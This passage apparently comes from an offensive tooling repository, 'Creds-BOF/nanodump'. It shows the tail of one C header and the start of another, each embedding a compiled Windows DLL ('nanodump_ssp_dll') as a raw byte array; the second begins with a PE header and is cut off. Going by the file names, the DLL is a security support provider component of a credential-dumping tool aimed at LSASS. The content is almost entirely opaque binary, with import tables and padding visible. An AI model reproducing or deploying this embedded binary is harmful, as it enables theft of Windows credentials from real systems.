00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x10,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xF0,0x14,0x01,0x00,0x88,0x11,0x01,0x00,0xA8,0x10,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x6C,0x15,0x01,0x00,0xF0,0x11,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xD0,0x12,0x01,0x00,0x00,0x00,0x00,0x00,0xE8,0x12,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x13,0x01,0x00,0x00,0x00,0x00,0x00,0x10,0x13,0x01,0x00,0x00,0x00,0x00,0x00,0x22,0x13,0x01,0x00,0x00,0x00,0x00,0x00,0x2E,0x13,0x01,0x00,0x00,0x00,0x00,0x00,0x3A,0x13,0x01,0x00,0x00,0x00,0x00,0x00,0x56,0x13,0x01,0x00,0x00,0x00,0x00,0x00,0x6E,0x13,0x01,0x00,0x00,0x00,0x00,0x00,0x76,0x13,0x01,0x00,0x00,0x00,0x00,0x00,0x84,0x13,0x01,0x00,0x00,0x00,0x00,0x00,0x96,0x13,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xA6,0x13,0x01,0x00,0x00,0x00,0x00,0x00,0xB4,0x13,0x01,0x00,0x00,0x00,0x00,0x00,0xC2,0x13,0x01,0x00,0x00,0x00,0x00,0x00,0xCE,0x13,0x01,0x00,0x00,0x00,0x00,0x00,0xD6,0x13,0x01,0x00,0x00,0x00,0x00,0x00,0xE0,0x13,0x01,0x00,0x00,0x00,0x00,0x00,0xEA,0x13,0x01,0x00,0x00,0x00,0x00,0x00,0xF6,0x13,0x01,0x00,0x00,0x00,0x00,0x00,0xFE,0x13,0x01,0x00,0x00,0x00,0x00,0x00,0x08,0x14,0x01,0x00,0x00,0x00,0x00,0x00,0x10,0x14,0x01,0x00,0x00,0x00,0x00,0x00,0x1A,0x14,0x01,0x00,0x00,0x00,0x00,0x00,0x26,0x14,0x01,0x00,0x00,0x00,0x00,0x00,0x30,0x14,0x01,0x00,0x00,0x00,0x00,0x00,0x3A,0x14,0x01,0x00,0x00,0x00,0x00,0x00,0x44,0x14,0x01,0x00,0x00,0x00,0x00,0x00,0x4C,0x14,0x01,0x00,0x00,0x00,0x00,0x00,0x56,0x14,0x01,0x00,0x00,0x00,0x00,0x00,0x5E,0x14,0x01,0x00,0x00,0x00,0x00,0x00,0x68,0x14,0x01,0x00,0x00,0x00,0x00,0x00,0x72,0x14,0x01,0x00,0x00,0x00,0x00,0x00,0x7C,0x14,0x01,0x00,0x00,0x00,0x00,0x00,0x86,0x14,0x01,0x00,0x00,0x00,0x00,0x00,0x94,0x14,0x01,0x00,0x00,0x00,0x00,0x00,0xA0,0x14,0x01,0x00,0x00,0x00,0x00,0x00,0xAA,0x14,0x01,0x00,0x00,0x00,0x00,0x00,0xB4,0x14,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xD0,0x12,0x01,0x00,0x00,0x00,0x00,0x00,0xE8,0x12,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x13,0x01,0x00,0x00,0x00,0x00,0x00,0x10,0x13,0x01,0x00,0x00,0x00,0x00,0x00,0x22,0x13,0x01,0x00,0x00,0x00,0x00,0x00,0x2E,0x13,0x01,0x00,0x00,0x00,0x00,0x00,0x3A,0x13,0x01,0x00,0x00,0x00,0x00,0x00,0x56,0x13,0x01,0x00,0x00,0x00,0x00,0x00,0x6E,0x13,0x01,0x00,0x00,0x00,0x00,0x00,0x76,0x13,0x01,0x00,0x00,0x00,0x00,0x00,0x84,0x13,0x01,0x00,0x00,0x00,0x00,0x00,0x96,0x13,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xA6,0x13,0x01,0x00,0x00,0x00,0x00,0x00,0xB4,0x13,0x01,0x00,0x00,0x00,0x00,0x00,0xC2,0x13,0x01,0x00,0x00,0x00,0x00,0x00,0xCE,0x13,0x01,0x00,0x00,0x00,0x00,0x00,0xD6,0x13,0x01,0x00,0x00,0x00,0x00,0x00,0xE0,0x13,0x01,0x00,0x00,0x00,0x00,0x00,0xEA,0x13,0x01,0x00,0x00,0x00,0x00,0x00,0xF6,0x13,0x01,0x00,0x00,0x00,0x00,0x00,0xFE,0x13,0x01,0x00,0x00,0x00,0x00,0x00,0x08,0x14,0x01,0x00,0x00,0x00,0x00,0x00,0x10,0x14,0x01,0x00,0x00,0x00,0x00,0x00,0x1A,0x14,0x01,0x00,0x00,0x00,0x00,0x00,0x26,0x14,0x01,0x00,0x00,0x00,0x00,0x00,0x30,0x14,0x01,0x00,0x00,0x00,0x00,0x00,0x3A,0x14,0x01,0x00,0x00,0x00,0x00,0x00,0x44,0x14,0x01,0x00,0x00,0x00,0x00,0x00,0x4C,0x14,0x01,0x00,0x00,0x00,0x00,0x00,0x56,0x14,0x01,0x00,0x00,0x00,0x00,0x00,0x5E,0x14,0x01,0x00,0x00,0x00,0x00,0x00,0x68,0x14,0x01,0x00,0x00,0x00,0x00,0x00,0x72,0x14,0x01,0x00,0x00,0x00,0x00,0x00,0x7C,0x14,0x01,0x00,0x00,0x00,0x00,0x00,0x86,0x14,0x01,0x00,0x00,0x00,0x00,0x00,0x94,0x14,0x01,0x00,0x00,0x00,0x00,0x00,0xA0,0x14,0x01,0x00,0x00,0x00,0x00,0x00,0xAA,0x14,0x01,0x00,0x00,0x00,0x00,0x00,0xB4,0x14,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x19,0x01,0x44,0x65,0x6C,0x65,0x74,0x65,0x43,0x72,0x69,0x74,0x69,0x63,0x61,0x6C,0x53,0x65,0x63,0x74,0x69,0x6F,0x6E,0x00,0x3D,0x01,0x45,0x6E,0x74,0x65,0x72,0x43,0x72,0x69,0x74,0x69,0x63,0x61,0x6C,0x53,0x65,0x63,0x74,0x69,0x6F,0x6E,0x00,0x00,0x74,0x02,0x47,0x65,0x74,0x4C,0x61,0x73,0x74,0x45,0x72,0x72,0x6F,0x72,0x00,0x00,0xCA,0x02,0x47,0x65,0x74,0x50,0x72,0x6F,0x63,0x65,0x73,0x73,0x48,0x65,0x61,0x70,0x00,0x00,0x5D,0x03,0x48,0x65,0x61,0x70,0x41,0x6C,0x6C,0x6F,0x63,0x00,0x63,0x03,0x48,0x65,0x61,0x70,0x46,0x72,0x65,0x65,0x00,0x00,0x7A,0x03,0x49,0x6E,0x69,0x74,0x69,0x61,0x6C,0x69,0x7A,0x65,0x43,0x72,0x69,0x74,0x69,0x63,0x61,0x6C,0x53,0x65,0x63,0x74,0x69,0x6F,0x6E,0x00,0xD6,0x03,0x4C,0x65,0x61,0x76,0x65,0x43,0x72,0x69,0x74,0x69,0x63,0x61,0x6C,0x53,0x65,0x63,0x74,0x69,0x6F,0x6E,0x00,0x00,0x7F,0x05,0x53,0x6C,0x65,0x65,0x70,0x00,0xA2,0x05,0x54,0x6C,0x73,0x47,0x65,0x74,0x56,0x61,0x6C,0x75,0x65,0x00,0xD1,0x05,0x56,0x69,0x72,0x74,0x75,0x61,0x6C,0x50,0x72,0x6F,0x74,0x65,0x63,0x74,0x00,0x00,0xD3,0x05,0x56,0x69,0x72,0x74,0x75,0x61,0x6C,0x51,0x75,0x65,0x72,0x79,0x00,0x00,0x54,0x00,0x5F,0x5F,0x69,0x6F,0x62,0x5F,0x66,0x75,0x6E,0x63,0x00,0x00,0x78,0x00,0x5F,0x61,0x6D,0x73,0x67,0x5F,0x65,0x78,0x69,0x74,0x00,0x00,0x1D,0x01,0x5F,0x69,0x6E,0x69,0x74,0x74,0x65,0x72,0x6D,0x00,0x83,0x01,0x5F,0x6C,0x6F,0x63,0x6B,0x00,0xB3,0x02,0x5F,0x74,0x69,0x6D,0x65,0x36,0x34,0x00,0xCA,0x02,0x5F,0x75,0x6E,0x6C,0x6F,0x63,0x6B,0x00,0x0B,0x03,0x5F,0x77,0x63,0x73,0x69,0x63,0x6D,0x70,0x00,0x00,0x87,0x03,0x61,0x62,0x6F,0x72,0x74,0x00,0x98,0x03,0x63,0x61,0x6C,0x6C,0x6F,0x63,0x00,0x00,0xC0,0x03,0x66,0x72,0x65,0x65,0x00,0x00,0xCD,0x03,0x66,0x77,0x72,0x69,0x74,0x65,0x00,0x00,0x00,0x04,0x6D,0x62,0x73,0x74,0x6F,0x77,0x63,0x73,0x00,0x00,0x04,0x04,0x6D,0x65,0x6D,0x63,0x6D,0x70,0x00,0x00,0x05,0x04,0x6D,0x65,0x6D,0x63,0x70,0x79,0x00,0x00,0x07,0x04,0x6D,0x65,0x6D,0x73,0x65,0x74,0x00,0x00,0x19,0x04,0x72,0x61,0x6E,0x64,0x00,0x00,0x1A,0x04,0x72,0x65,0x61,0x6C,0x6C,0x6F,0x63,0x00,0x2E,0x04,0x73,0x72,0x61,0x6E,0x64,0x00,0x3C,0x04,0x73,0x74,0x72,0x6C,0x65,0x6E,0x00,0x00,0x3F,0x04,0x73,0x74,0x72,0x6E,0x63,0x6D,0x70,0x00,0x40,0x04,0x73,0x74,0x72,0x6E,0x63,0x70,0x79,0x00,0x43,0x04,0x73,0x74,0x72,0x72,0x63,0x68,0x72,0x00,0x4E,0x04,0x73,0x77,0x70,0x72,0x69,0x6E,0x74,0x66,0x5F,0x73,0x00,0x00,0x60,0x04,0x76,0x66,0x70,0x72,0x69,0x6E,0x74,0x66,0x00,0x00,0x7B,0x04,0x77,0x63,0x73,0x6E,0x63,0x61,0x74,0x00,0x7E,0x04,0x77,0x63,0x73,0x6E,0x63,0x70,0x79,0x00,0x82,0x04,0x77,0x63,0x73,0x72,0x63,0x68,0x72,0x00,0x00,0x00,0x00,0x10,0x01,0x00,0x00,0x10,0x01,0x00,0x00,0x10,0x01,0x00,0x00,0x10,0x01,0x00,0x00,0x10,0x01,0x00,0x00,0x10,0x01,0x00,0x00,0x10,0x01,0x00,0x00,0x10,0x01,0x00,0x00,0x10,0x01,0x00,0x00,0x10,0x01,0x00,0x00,0x10,0x01,0x00,0x00,0x10,0x01,0x00,0x4B,0x45,0x52,0x4E,0x45,0x4C,0x33,0x32,0x2E,0x64,0x6C,0x6C,0x00,0x00,0x00,0x00,0x14,0x10,0x01,0x00,0x14,0x10,0x01,0x00,0x14,0x10,0x01,0x00,0x14,0x10,0x01,0x00,0x14,0x10,0x01,0x00,0x14,0x10,0x01,0x00,0x14,0x10,0x01,0x00,0x14,0x10,0x01,0x00,0x14,0x10,0x01,0x00,0x14,0x10,0x01,0x00,0x14,0x10,0x01,0x00,0x14,0x10,0x01,0x00,0x14,0x10,0x01,0x00,0x14,0x10,0x01,0x00,0x14,0x10,0x01,0x00,0x14,0x10,0x01,0x00,0x14,0x10,0x01,0x00,0x14,0x10,0x01,0x00,0x14,0x10,0x01,0x00,0x14,0x10,0x01,0x00,0x14,0x10,0x01,0x00,0x14,0x10,0x01,0x00,0x14,0x10,0x01,0x00,0x14,0x10,0x01,0x00,0x14,0x10,0x01,0x00,0x14,0x10,0x01,0x00,0x14,0x10,0x01,0x00,0x6D,0x73,0x76,0x63,0x72,0x74,0x2E,0x64,0x6C,0x6C,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x10,0x8A,0xD9,0x02,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xE0,0x70,0x8A,0xD9,0x02,0x00,0x00,0x00,0xB0,0x70,0x8A,0xD9,0x02,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x80,0x00,0x00,0x0C,0x00,0x00,0x00,0xE8,0xA0,0x00,0x00,0x00,0x90,0x00,0x00,0x14,0x00,0x00,0x00,0x10,0xA0,0x40,0xA0,0x50,0xA0,0x58,0xA0,0x60,0xA0,0x00,0x00,0x00,0xA0,0x00,0x00,0x30,0x00,0x00,0x00,0xA0,0xA2,0xC0,0xA2,0xC8,0xA2,0xD0,0xA2,0xD8,0xA2,0x60,0xA4,0x70,0xA4,0x80,0xA4,0x90,0xA4,0xA0,0xA4,0xB0,0xA4,0xC0,0xA4,0xD0,0xA4,0xE0,0xA4,0xF0,0xA4,0x00,0xA5,0x10,0xA5,0x20,0xA5,0x30,0xA5,0x00,0x00,0x00,0x20,0x01,0x00,0x10,0x00,0x00,0x00,0x18,0xA0,0x30,0xA0,0x38,0xA0,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,};
unsigned int nanodump_ssp_dll_len = 40448;


================================================
FILE: Creds-BOF/nanodump/include/nanodump_ssp_dll.x86.h
================================================
#pragma once

unsigned char nanodump_ssp_dll[] = {0x4D,0x5A,0x90,0x00,0x03,0x00,0x00,0x00,0x04,0x00,0x00,0x00,0xFF,0xFF,0x00,0x00,0xB8,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x80,0x00,0x00,0x00,0x0E,0x1F,0xBA,0x0E,0x00,0xB4,0x09,0xCD,0x21,0xB8,0x01,0x4C,0xCD,0x21,0x54,0x68,0x69,0x73,0x20,0x70,0x72,0x6F,0x67,0x72,0x61,0x6D,0x20,0x63,0x61,0x6E,0x6E,0x6F,0x74,0x20,0x62,0x65,0x20,0x72,0x75,0x6E,0x20,0x69,0x6E,0x20,0x44,0x4F,0x53,0x20,0x6D,0x6F,0x64,0x65,0x2E,0x0D,0x0D,0x0A,0x24,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x50,0x45,0x00,0x00,0x4C,0x01,0x0A,0x00,0x80,0x79,0x7A,0x68,0x00,0x92,0x00,0x00,0x00,0x00,0x00,0x00,0xE0,0x00,0x0E,0x23,0x0B,0x01,0x02,0x29,0x00,0x5E,0x00,0x00,0x00,0x8E,0x00,0x00,0x00,0x1C,0x00,0x00,0xB0,0x13,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x70,0x00,0x00,0x00,0x00,0x88,0x6C,0x00,0x10,0x00,0x00,0x00,0x02,0x00,0x00,0x04,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x04,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x01,0x00,0x00,0x04,0x00,0x00,0x2E,0x82,0x01,0x00,0x03,0x00,0x40,0x01,0x00,0x00,0x20,0x00,0x00,0x10,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x10,0x00,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x00,0xD0,0x00,0x00,0x52,0x00,0x00,0x00,0x00,0xE0,0x00,0x00,0x98,0x04,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x10,0x01,0x00,0xF8,0x02,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0